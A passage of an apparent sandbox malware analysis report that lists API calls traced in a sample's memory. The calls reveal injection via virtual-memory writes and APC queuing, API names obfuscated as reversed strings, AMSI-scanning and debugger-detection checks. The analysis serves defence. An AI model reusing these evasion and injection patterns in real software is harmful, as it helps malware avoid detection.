                                                                                                                        • NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 02D4DDF0
                                                                                                                        • NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 02D4DE1C
                                                                                                                        • NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 02D4DE25
                                                                                                                          • Part of subcall function 02D34C60: SysFreeString.OLEAUT32(02D4F4A4), ref: 02D34C6E
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: File$PathString$AllocCloseFreeInformationNameName_OpenQueryRead
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1897104825-0
                                                                                                                        • Opcode ID: b020cbd8fa6c89ddde9eb9083e119aba9c27c1de769a0f64e142a1b159bd7d60
                                                                                                                        • Instruction ID: 3b79efffecdfbc1034d9f3c87e6d21715074a8009d88ebf65293c825b7f15850
                                                                                                                        • Opcode Fuzzy Hash: b020cbd8fa6c89ddde9eb9083e119aba9c27c1de769a0f64e142a1b159bd7d60
                                                                                                                        • Instruction Fuzzy Hash: 8A21C071A40208BFEB51EA94DC52FDE77BDEB48B00F500461B600F72C0DAB4AE048B64
                                                                                                                        Function 02D4E4B8 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 111networkCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                        • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02D4E5F6
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CheckConnectionInternet
                                                                                                                        • String ID: Initialize$OpenSession$ScanBuffer
                                                                                                                        • API String ID: 3847983778-3852638603
                                                                                                                        • Opcode ID: c1693ed1c162562df7fd7a6d1ec28eedded59394fd5ba324edd22e8f1a0208db
                                                                                                                        • Instruction ID: dfd82715519e60b0460fce59f09705d56ca09ff2ff9a8d9fcc212862ef006b47
                                                                                                                        • Opcode Fuzzy Hash: c1693ed1c162562df7fd7a6d1ec28eedded59394fd5ba324edd22e8f1a0208db
                                                                                                                        • Instruction Fuzzy Hash: F441FF35B11188ABEB02EBA4E841ADEB3FAFF88700F504825E045A7351DE78AD058F75
                                                                                                                        Function 02D4DC8C Relevance: 6.1, APIs: 4, Instructions: 80nativefileCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                          • Part of subcall function 02D34F20: SysAllocStringLen.OLEAUT32(?,?), ref: 02D34F2E
                                                                                                                        • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02D4DD5E), ref: 02D4DCCB
                                                                                                                        • NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02D4DD05
                                                                                                                        • NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02D4DD32
                                                                                                                        • NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02D4DD3B
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: FilePath$AllocCloseCreateNameName_StringWrite
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3764614163-0
                                                                                                                        • Opcode ID: d83e30d17a6b53484c978ce54f1336ad3f05e815eb50e3c1b88919300f54a6b5
                                                                                                                        • Instruction ID: 324643a3d0921ea088fccdfd8402c456dff28d965c42341c9ef6d38fbdc00624
                                                                                                                        • Opcode Fuzzy Hash: d83e30d17a6b53484c978ce54f1336ad3f05e815eb50e3c1b88919300f54a6b5
                                                                                                                        • Instruction Fuzzy Hash: 3C21CD71A40208BFEB11EAA4DD42FDEB7BDEB05B00F614561B600F72C0DBB46E048B64
                                                                                                                        Function 02D48788 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62processCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                          • Part of subcall function 02D481CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02D4823C,?,?,00000000,?,02D47A7E,ntdll,00000000,00000000,02D47AC3,?,?,00000000), ref: 02D4820A
                                                                                                                          • Part of subcall function 02D481CC: GetModuleHandleA.KERNELBASE(?), ref: 02D4821E
                                                                                                                          • Part of subcall function 02D48274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02D482FC,?,?,00000000,00000000,?,02D48215,00000000,KernelBASE,00000000,00000000,02D4823C), ref: 02D482C1
                                                                                                                          • Part of subcall function 02D48274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02D482C7
                                                                                                                          • Part of subcall function 02D48274: GetProcAddress.KERNEL32(?,?), ref: 02D482D9
                                                                                                                        • CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02D48814
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: HandleModule$AddressProc$CreateProcessUser
                                                                                                                        • String ID: CreateProcessAsUserW$Kernel32
                                                                                                                        • API String ID: 3130163322-2353454454
                                                                                                                        • Opcode ID: 3fc58effa7842c889ae228205c9f10c6627d7da20dcc9b1657b40cec346bf094
                                                                                                                        • Instruction ID: f51e1accf64b2de770cd924a7ac5f8bf5bfbc6f02e2e411cc3aba80973b43000
                                                                                                                        • Opcode Fuzzy Hash: 3fc58effa7842c889ae228205c9f10c6627d7da20dcc9b1657b40cec346bf094
                                                                                                                        • Instruction Fuzzy Hash: DD11D6B2640248EFEB42EE98EC51F9A77EDEB4CB50F514410BA08E3340C634ED109B24
                                                                                                                        Function 02D47A2A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52memorynativeCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 02D481CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02D4823C,?,?,00000000,?,02D47A7E,ntdll,00000000,00000000,02D47AC3,?,?,00000000), ref: 02D4820A
                                                                                                                          • Part of subcall function 02D481CC: GetModuleHandleA.KERNELBASE(?), ref: 02D4821E
                                                                                                                          • Part of subcall function 02D48274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02D482FC,?,?,00000000,00000000,?,02D48215,00000000,KernelBASE,00000000,00000000,02D4823C), ref: 02D482C1
                                                                                                                          • Part of subcall function 02D48274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02D482C7
                                                                                                                          • Part of subcall function 02D48274: GetProcAddress.KERNEL32(?,?), ref: 02D482D9
                                                                                                                        • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02D47A9F
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: HandleModule$AddressProc$AllocateMemoryVirtual
                                                                                                                        • String ID: ntdll$yromeMlautriVetacollAwZ
                                                                                                                        • API String ID: 4072585319-445027087
                                                                                                                        • Opcode ID: 7f0a91a3aecb236d981c91613cb142390d42b8d112567ec7833ce0bcb75200a3
                                                                                                                        • Instruction ID: fd72b26842810d39d7108752e1ea74f99a86ccebded6a61ef064039cb7abdf36
                                                                                                                        • Opcode Fuzzy Hash: 7f0a91a3aecb236d981c91613cb142390d42b8d112567ec7833ce0bcb75200a3
                                                                                                                        • Instruction Fuzzy Hash: 4C110976644208BFEB05EFA4EC51EAAB7AEEB48B00F514461B904D7740DA34AE148B74
                                                                                                                        Function 02D47A2C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51memorynativeCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 02D481CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02D4823C,?,?,00000000,?,02D47A7E,ntdll,00000000,00000000,02D47AC3,?,?,00000000), ref: 02D4820A
                                                                                                                          • Part of subcall function 02D481CC: GetModuleHandleA.KERNELBASE(?), ref: 02D4821E
                                                                                                                          • Part of subcall function 02D48274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02D482FC,?,?,00000000,00000000,?,02D48215,00000000,KernelBASE,00000000,00000000,02D4823C), ref: 02D482C1
                                                                                                                          • Part of subcall function 02D48274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02D482C7
                                                                                                                          • Part of subcall function 02D48274: GetProcAddress.KERNEL32(?,?), ref: 02D482D9
                                                                                                                        • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02D47A9F
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: HandleModule$AddressProc$AllocateMemoryVirtual
                                                                                                                        • String ID: ntdll$yromeMlautriVetacollAwZ
                                                                                                                        • API String ID: 4072585319-445027087
                                                                                                                        • Opcode ID: 1f317573dde9cd81147298677331e282ea7d054f5a6cd4d689d8a71d7b6fd4bd
                                                                                                                        • Instruction ID: 2249fde1bbe607c024d2169e01fa3badfce9c694832df625ca0970262976358e
                                                                                                                        • Opcode Fuzzy Hash: 1f317573dde9cd81147298677331e282ea7d054f5a6cd4d689d8a71d7b6fd4bd
                                                                                                                        • Instruction Fuzzy Hash: D9111776644208FFEB05EFA4EC92E9EB7AEEB48B00F514461B904D7740DA34AE148F74
                                                                                                                        Function 02D47D78 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49nativeCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 02D481CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02D4823C,?,?,00000000,?,02D47A7E,ntdll,00000000,00000000,02D47AC3,?,?,00000000), ref: 02D4820A
                                                                                                                          • Part of subcall function 02D481CC: GetModuleHandleA.KERNELBASE(?), ref: 02D4821E
                                                                                                                          • Part of subcall function 02D48274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02D482FC,?,?,00000000,00000000,?,02D48215,00000000,KernelBASE,00000000,00000000,02D4823C), ref: 02D482C1
                                                                                                                          • Part of subcall function 02D48274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02D482C7
                                                                                                                          • Part of subcall function 02D48274: GetProcAddress.KERNEL32(?,?), ref: 02D482D9
                                                                                                                        • NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02D47DEC
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: HandleModule$AddressProc$MemoryVirtualWrite
                                                                                                                        • String ID: Ntdll$yromeMlautriVetirW
                                                                                                                        • API String ID: 2719805696-3542721025
                                                                                                                        • Opcode ID: d837245156585d9545f39098703b304c67fbe50d1af87a44b19241ab87e147af
                                                                                                                        • Instruction ID: 4a1202ae83b7d562006e4c74d83b0bb582d88410ffaadaa63af3913419b4aebe
                                                                                                                        • Opcode Fuzzy Hash: d837245156585d9545f39098703b304c67fbe50d1af87a44b19241ab87e147af
                                                                                                                        • Instruction Fuzzy Hash: DA010C76640209EFEB01EF98EC51E9AB7EDEB89B00F514860B944D7740DB34AD148F74
                                                                                                                        Function 02D48730 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21nativethreadCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 02D481CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02D4823C,?,?,00000000,?,02D47A7E,ntdll,00000000,00000000,02D47AC3,?,?,00000000), ref: 02D4820A
                                                                                                                          • Part of subcall function 02D481CC: GetModuleHandleA.KERNELBASE(?), ref: 02D4821E
                                                                                                                          • Part of subcall function 02D48274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02D482FC,?,?,00000000,00000000,?,02D48215,00000000,KernelBASE,00000000,00000000,02D4823C), ref: 02D482C1
                                                                                                                          • Part of subcall function 02D48274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02D482C7
                                                                                                                          • Part of subcall function 02D48274: GetProcAddress.KERNEL32(?,?), ref: 02D482D9
                                                                                                                        • NtQueueApcThread.NTDLL(?,?,?,?,?), ref: 02D48761
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: HandleModule$AddressProc$QueueThread
                                                                                                                        • String ID: NtQueueApcThread$ntdll
                                                                                                                        • API String ID: 3075473611-1374908105
                                                                                                                        • Opcode ID: 1d546e75056681dbb4f28ed71b36f1db6af4e6089afd93b57b46e848838ebc93
                                                                                                                        • Instruction ID: e0665bc9893b7bc8b2787db296297a3372d3c1b9593d9b1183f4c7486e2837ec
                                                                                                                        • Opcode Fuzzy Hash: 1d546e75056681dbb4f28ed71b36f1db6af4e6089afd93b57b46e848838ebc93
                                                                                                                        • Instruction Fuzzy Hash: 4FE026B2780249EF9B40EED9EC95D8B7BECAB49790B044401FA59D7301CA70ED209B71
                                                                                                                        Function 02D4DBB0 Relevance: 4.5, APIs: 3, Instructions: 47filenativeCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • RtlI.N(?,?,00000000,02D4DC7E), ref: 02D4DC2C
                                                                                                                        • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,?,?,00000000,02D4DC7E), ref: 02D4DC42
                                                                                                                        • NtDeleteFile.N(?,00000000,?,00000000,00000000,?,?,00000000,02D4DC7E), ref: 02D4DC61
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Path$DeleteFileNameName_
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4284456518-0
                                                                                                                        • Opcode ID: d8e5ea7dceaeebf57aff05fccca5306cf33934d9bae155690a2fa7fd4c1cd0be
                                                                                                                        • Instruction ID: 625f39d2cbf3d3bcc3704e19d4f7c8a3f3b91e9f9376d83b75d6a92bbbe7c708
                                                                                                                        • Opcode Fuzzy Hash: d8e5ea7dceaeebf57aff05fccca5306cf33934d9bae155690a2fa7fd4c1cd0be
                                                                                                                        • Instruction Fuzzy Hash: 400162759442486FEB06DBA0DD41FCD77BAEB48704F5144929240E7281DEB4AF048B34
                                                                                                                        Function 02D4DC04 Relevance: 4.5, APIs: 3, Instructions: 45filenativeCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 02D34F20: SysAllocStringLen.OLEAUT32(?,?), ref: 02D34F2E
                                                                                                                        • RtlI.N(?,?,00000000,02D4DC7E), ref: 02D4DC2C
                                                                                                                        • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,?,?,00000000,02D4DC7E), ref: 02D4DC42
                                                                                                                        • NtDeleteFile.N(?,00000000,?,00000000,00000000,?,?,00000000,02D4DC7E), ref: 02D4DC61
                                                                                                                          • Part of subcall function 02D34C60: SysFreeString.OLEAUT32(02D4F4A4), ref: 02D34C6E
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: PathString$AllocDeleteFileFreeNameName_
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1530111750-0
                                                                                                                        • Opcode ID: 4878937f207d75d39e945a82b7080e0e8192bad305ab1c62fa4e23e0701396bc
                                                                                                                        • Instruction ID: 254a6be7af88f99c31c60ee75c48d4eef52adfe9d056df34996b4096a502ee05
                                                                                                                        • Opcode Fuzzy Hash: 4878937f207d75d39e945a82b7080e0e8192bad305ab1c62fa4e23e0701396bc
                                                                                                                        • Instruction Fuzzy Hash: 9701EC7594020CBBEB11EBA0DD42FCDB3BEEB48700F5144A1A601E2680EAB4AF048A74
                                                                                                                        Function 02D46DC8 Relevance: 1.5, APIs: 1, Instructions: 48comCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 02D46D6C: CLSIDFromProgID.OLE32(00000000,?,00000000,02D46DB9,?,?,?,00000000), ref: 02D46D99
                                                                                                                        • CoCreateInstance.OLE32(?,00000000,00000005,02D46EAC,00000000,00000000,02D46E2B,?,00000000,02D46E9B), ref: 02D46E17
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateFromInstanceProg
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2151042543-0
                                                                                                                        • Opcode ID: 3fdab2c894a0074f8163125db21f3f087750d728f29be097c5853c8075065933
                                                                                                                        • Instruction ID: 074268c2a54b2cb82076dfbfcbec09642b2b53834d6ba6eb3d7f63f12fcb7f83
                                                                                                                        • Opcode Fuzzy Hash: 3fdab2c894a0074f8163125db21f3f087750d728f29be097c5853c8075065933
                                                                                                                        • Instruction Fuzzy Hash: 8A01D4B12087046FE711EF61EC1286B7BEDD74AB10F518835F406E2740EA71DD0488B0
                                                                                                                        Function 02D4F7C8 Relevance: 229.6, APIs: 8, Strings: 118, Instructions: 9071COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • InetIsOffline.URL(00000000,00000000,02D5B784,?,?,?,00000000,00000000), ref: 02D4F801
                                                                                                                          • Part of subcall function 02D489D0: FreeLibrary.KERNEL32(74FA0000,00000000,00000000,00000000,00000000,02DB738C,Function_0000662C,00000004,02DB739C,02DB738C,05F5E103,00000040,02DB73A0,74FA0000,00000000,00000000), ref: 02D48AAA
                                                                                                                          • Part of subcall function 02D4F6E8: GetModuleHandleW.KERNEL32(KernelBase,?,02D4FAEB,UacInitialize,02DB7380,02D5B7B8,OpenSession,02DB7380,02D5B7B8,ScanBuffer,02DB7380,02D5B7B8,ScanString,02DB7380,02D5B7B8,Initialize), ref: 02D4F6EE
                                                                                                                          • Part of subcall function 02D4F6E8: GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 02D4F700
                                                                                                                          • Part of subcall function 02D4F744: GetModuleHandleW.KERNEL32(KernelBase), ref: 02D4F754
                                                                                                                          • Part of subcall function 02D4F744: GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 02D4F766
